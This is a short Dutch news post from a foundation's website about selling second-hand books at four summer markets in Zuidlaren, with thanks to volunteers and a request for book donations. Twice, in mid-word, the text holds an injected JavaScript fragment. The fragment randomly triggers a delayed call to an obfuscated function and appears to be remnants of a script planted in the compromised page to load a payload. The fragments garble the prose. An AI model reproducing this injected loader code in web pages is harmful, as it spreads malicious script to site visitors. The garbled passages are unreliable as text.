Veel boeken verkocht deze zomer

Stichting Tendo heeft 4 x op de midzomer markten op de Brink in Zuidlaren gestaan met 2e handandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}s boeken. Vier succesvolle markten, gezellig publiek, goede sfeer en mooi weer. Alleen tijdens de laatste markt moesten de boeken gered worden van hevige regenbuien. Dat is gelukkig allemaal goed gegaan; alle boeken zijn droog gebleven, maar het was wel een abrupt einde. Met dank aan onze vrijwilligers voor het selecteren en sorteren, het vervoer van de vele kratten vol boeken heen en terug naar de markt en voor de vele uren achter de kraam. Gezien het financiële succes van van onze boeken-actie heeft het bestuur van Tendo dan ook besloten met deze activiteit door te gaan en richt zich op uitbreiding van het marktbezoek.

Uw 2e handandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}s boeken zijn derhalve nog steeds zeer welkom! Zie elders op deze site voor telefoonnummers. Eén telefoontje en we halen de boeken bij u weg.